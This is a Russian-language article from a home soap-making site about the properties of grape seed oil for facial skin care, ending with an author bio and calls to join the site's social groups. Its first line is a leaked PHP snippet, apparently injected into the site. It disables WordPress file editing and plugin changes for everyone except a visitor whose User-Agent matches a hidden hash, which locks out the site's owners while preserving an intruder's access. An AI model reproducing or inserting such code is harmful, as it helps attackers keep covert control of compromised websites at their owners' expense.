if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Масло виноградных косточек | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

Масло виноградных косточек

Масло виноградных косточек является одним из самых популярных растительных масел применяемых в косметологии. Как уже не сложно догадаться из названия, этот продукт получают из высушенных виноградных косточек двумя способами

Ингредиенты мыла - масло виноградной косточки Ингредиенты мыла - масло виноградной косточки

Мас­ло вино­град­ных косто­чек явля­ет­ся одним из самых попу­ляр­ных рас­ти­тель­ных масел при­ме­ня­е­мых в косметологии.

Как уже не слож­но дога­дать­ся из назва­ния, этот про­дукт полу­ча­ют из высу­шен­ных вино­град­ных косто­чек дву­мя спо­со­ба­ми — мето­дом холод­но­го и горя­че­го прес­со­ва­ния. При­чем в резуль­та­те холод­но­го отжи­ма, полу­ча­е­мое мас­ло содер­жит в себе гораз­до боль­ший про­цент полез­ных веществ, неже­ли мас­ло, полу­чен­ное путем горя­че­го отжима.

Но дело в том, что в отли­чие от холод­но­го прес­со­ва­ния, метод горя­че­го прес­со­ва­ния поз­во­ля­ет полу­чать в несколь­ко раз боль­шее коли­че­ство сырья, что очень выгод­но про­из­во­ди­те­лям. Тем не менее, в про­да­же все­гда мож­но най­ти и мас­ло вино­град­ных косто­чек холод­но­го отжи­ма, кото­рое наи­бо­лее реко­мен­ду­ет­ся для при­ме­не­ния в косметологии.

Нату­раль­ное мас­ло вино­град­ных косто­чек про­сто заме­ча­тель­но под­хо­дит для ухо­да за кожей лица, и в первую оче­редь это обу­слав­ли­ва­ет­ся его уни­каль­ным соста­вом, в кото­рый вхо­дит мно­же­ство полез­ных эле­мен­тов и вита­ми­нов (A, B, C, E, PP).
Осо­бое вни­ма­ние сле­ду­ет обра­тить на содер­жа­ние в мас­ле вино­град­ных косто­чек доволь­но таки высо­ко­го про­цен­та вита­ми­на E. Имен­но вита­мин E помо­га­ет на доль­ше сохра­нить моло­дость кожи, и избе­жать таких ее воз­раст­ных изме­не­ний, как поте­ря влаж­но­сти, упру­го­сти и эла­стич­но­сти, истон­че­ние, иссу­ше­ние, вялость, дряб­лость, обра­зо­ва­ние мор­щин, и про­чие при­зна­ки, сви­де­тель­ству­ю­щие о начи­на­ю­щем ста­ре­нии кожи.

Кро­ме того, основ­ную часть мас­ла вино­град­ных косто­чек состав­ля­ют нена­сы­щен­ные жир­ные кис­ло­ты, наи­боль­ший про­цент кото­рых – это про­сто неза­ме­ни­мая для кожи лино­ле­вая кис­ло­та. Бла­го­да­ря этой кис­ло­те кожа оста­ет­ся увлаж­нен­ной и глад­кой на дол­гое вре­мя. Недо­ста­ток же лино­ле­вой кис­ло­ты может при­ве­сти к повы­шен­ной сухо­сти и обиль­но­му шелу­ше­нию кожи.

Попу­ляр­ность при­ме­не­ния мас­ла вино­град­ных косто­чек в кос­ме­то­ло­гии заклю­ча­ет­ся еще и в том, что оно явля­ет­ся одним из немно­гих рас­ти­тель­ных масел, кото­рое вели­ко­леп­но под­хо­дит не толь­ко для ухо­да за сухой и увя­да­ю­щей кожей, но так­же и за жир­ной, и в том чис­ле и за про­блем­ной кожей.

Так, напри­мер, мас­ло вино­град­ных косто­чек пре­крас­но помо­га­ет сузить рас­ши­рен­ные поры на лице, хоро­шо впи­ты­ва­ет­ся в кожу, и прак­ти­че­ски не остав­ля­ет на ней жир­но­го блес­ка. При­ме­не­ние мас­ла вино­град­ных косто­чек для жир­ной кожи поз­во­ля­ет добить­ся мато­во­го и здо­ро­во­го цве­та лица, замет­но под­тя­нуть, и повы­сить упру­гость кожи, и при этом обес­пе­чить ей доста­точ­ное увлаж­не­ние. А так как мас­ло вино­град­ных косто­чек обла­да­ет еще хоро­шим про­ти­во­вос­па­ли­тель­ным и вяжу­щим дей­стви­ем, его эффек­тив­но исполь­зо­вать и при про­блем­ной коже, пора­жен­ной пры­ща­ми и угре­вой сыпью.

Мас­ло вино­град­ных косто­чек име­ет лег­кую кон­си­стен­цию, лег­ко и быст­ро впи­ты­ва­ет­ся в кожу, не заби­ва­ет поры, и не явля­ет­ся коме­до­гон­ным. Ну и, конеч­но же, не менее эффек­тив­ным явля­ет­ся при­ме­не­ние мас­ла вино­град­ных косто­чек и в ухо­де за осталь­ны­ми типа­ми кожи.

Свойства масла виноградных косточек

- мас­ло вино­град­ных косто­чек спо­соб­ству­ет хоро­ше­му увлаж­не­нию и смяг­че­нию кожи;
— устра­ня­ет сухость и шелу­ше­ние кожи;
— заме­ча­тель­но осве­жа­ет и тони­зи­ру­ет кожу;
— помо­га­ет повы­сить эла­стич­ность и упру­гость кожи, а так­же раз­гла­дить име­ю­щи­е­ся на ней неболь­шие мор­щин­ки (что осо­бен­но хоро­шо при ухо­де за увя­да­ю­щей кожей).

При регу­ляр­ном при­ме­не­нии мас­ла вино­град­ных косто­чек кожа лица ста­но­вит­ся мяг­кой, ров­ной и глад­кой, а так­же при­ят­но­го цве­та, здо­ро­вой и ухо­жен­ной на вид. Так­же мас­ло вино­град­ных косто­чек хоро­шо подой­дет для ухо­да за кожей вокруг глаз, и в каче­стве базо­во­го мас­ла для при­го­тов­ле­ния домаш­них кремов.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!